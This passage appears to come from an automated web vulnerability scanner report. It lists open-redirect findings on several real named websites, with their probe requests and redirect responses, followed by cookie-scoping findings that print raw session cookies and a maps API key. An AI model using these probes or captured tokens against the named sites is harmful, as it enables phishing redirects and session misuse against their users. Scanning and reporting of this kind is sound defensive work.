Host:   http://www.lalate.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a4580ed22114c9bfc/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a4580ed22114c9bfc/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lalate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:16:39 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://news.lalate.com?.a4580ed22114c9bfc/=1
Content-Type: text/html
Content-Length: 413

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...
12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsidehub.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a21e99389334330c9/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a21e99389334330c9/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsidehub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:17:51 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.outdoorhubmedia.com?.a21e99389334330c9/=1
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.outdoorhubme
...[SNIP]...
12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paypal-shopping.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a41eb98fd482d7dba/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a41eb98fd482d7dba/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paypal-shopping.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:13 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.7d DAV/2
Location: https://shopping.paypal.com?.a41eb98fd482d7dba/=1
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://shopping.paypal
...[SNIP]...
12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swipebids.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is used to perform an HTTP redirect. The payload .aa8aa6b452528219a/ was submitted in the REST URL parameter 1. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /.aa8aa6b452528219a/ HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swipebids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:42:00 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.swipeauctions.com.aa8aa6b452528219a/
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.swipeauction
...[SNIP]...
12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swipebids.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a1047f4f51f8a2875/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a1047f4f51f8a2875/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swipebids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:41:58 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.swipeauctions.comfavicon.ico?.a1047f4f51f8a2875/=1
Content-Length: 351
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.swipeauction
...[SNIP]...
12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.virtuagirlhd.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .afed92f41353af628/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.afed92f41353af628/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtuagirlhd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Sat, 02 Apr 2011 13:37:10 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
Location: http://www.virtuagirl.com?.afed92f41353af628/=1
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from www1.virtuagirl.com
X-Cache-Lookup: MISS from www1.virtuagirl.com:80
Via: 1.0 www1.virtuagirl.com:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.virtuagirl.com?.afed92f41353af628/=1
...[SNIP]...
13. Cookie scoped to parent domain  previous  next
There are 88 instances of this issue:

13.1. http://www.androidcentral.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
13.2. http://www.easybib.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.easybib.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easybib.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:31:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: BIBSESSID=nnaa8jpce46q9u08dcqc1n2kp6; expires=Sat, 09-Apr-2011 13:31:30 GMT; path=/; domain=.easybib.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml",CP="NOI DSP COR NID CURi DEVa OUR NOR"
Location: http://cdn.easybib.com/new-images/favicon.ico
Content-Length: 0

13.3. http://www.evite.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evite.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 4414
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200628547; path=/; domain=.evite.com


<!-- -->


<html>
<head>
<title>Evite</title>
<style type="text/css">@import url(http://cdn.evite.com/html/css/wizard_ie.css?ver=);</style>
<link rel="stylesheet" type="t
...[SNIP]...
13.4. http://www.genealogy.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

..............h...&... ..............(....... ...........@......................................J...........a.../.......]...................r...<...!...........g...................Q...(...B...x...W.
...[SNIP]...
13.5. http://www.mapquest.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mapquest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="JLUHhthGQfnS1TgXuuJQmiORiO8="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:30 GMT; Path=/
Set-Cookie: psession="UdOt/zUW/PqyIT51eoLXfzOifpQ="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:30 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1150-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: image/x-icon
Content-Length: 1150
Date: Sat, 02 Apr 2011 12:37:30 GMT

............ .h.......(....... ..... .............................?...?...?...?...?...?...?...?...?...?...?...?...?...?.......?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.
...[SNIP]...
13.6. http://www.mayoclinic.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=5216401;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: CFTOKEN=31014280;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: JSESSIONID=b230124a654d7a3c162276d7e9525c59751d;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
13.7. http://www.musiciansfriend.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

..............h.......(....... ...................................T...W.....W."?x.....;...p...[}..;.......0i..^...cf..S...-W...7o.AV....V.y...6As.8q...9r.,^..........X...?Fv.,O..Z...\...3q..m...Y.....
...[SNIP]...
13.8. http://www.ning.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

..............h.......(....... ...............................~...O.~.........[...C.u.....................r.............................................................................................
...[SNIP]...
13.9. http://www.pronto.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... .....@.............................................`3..........................................................b...[...[6..........................................
...[SNIP]...
13.10. http://www.softonic.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softonic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Expires: Thu, 07 Apr 2011 19:10:17 GMT
Cache-Control: max-age=451872, public
Last-Modified: Thu, 31 Mar 2011 19:10:17 GMT
ETag: "7cb651b31ce3c119df9a7081244f7ee6"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:39:04 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=2e29be89a8385992f825d6f55520437d; path=/; domain=softonic.com
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

............ .h.......(....... ..... ...................................9c..........................................,u.o............LT.v...t....M...........................C..q...r....5i.....o....%..o
...[SNIP]...
13.11. http://www.thisis50.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisis50.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:19 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=72496530-32a2-4001-aeeb-9a7e9872eab2;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:19 GMT
Set-Cookie: ning_session=hYUinaZPS4PpTu5L6SBL+6WnXz1ReXkZONMjZKkPvji77oXBafO3wf3mrh+eSamL2/SqG6uHda4=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:19 GMT
X-XN-Trace-Token: a9fbec7b-7dd0-41ce-b9e7-d77a0f275cdc
ETag: "84997-483-45a8520a9ed00"
Date: Sat, 02 Apr 2011 14:09:47 GMT
Date: Sat, 02 Apr 2011 14:09:47 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 04:35:32 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...
13.12. http://www.worthpoint.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ................................*?..6Q..Tr..o..#...,...3...f...@...T...>...>...f...J......................UU1....6........8c.R..<.. <....b.......0"...A..!R.B.p...B.aL`..
...[SNIP]...
13.13. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752060:GM=1:IG=3:SG=1:S=pQ1PkWLa_0C6rZC1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x; expires=Mon, 01-Apr-2013 13:57:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 13:57:29 GMT
Content-Length: 11871

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...
13.14. http://maps.google.com/maps/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gen_204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/gen_204?imp=maps_api_set_default_ui HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: mfe
Content-Length: 0
X-XSS-Protection: 1; mode=block

13.15. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.048799,0.102997&z=13&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sensor=false&mapclient=jsapi&vp=50.82267,-0.14441 HTTP/1.1
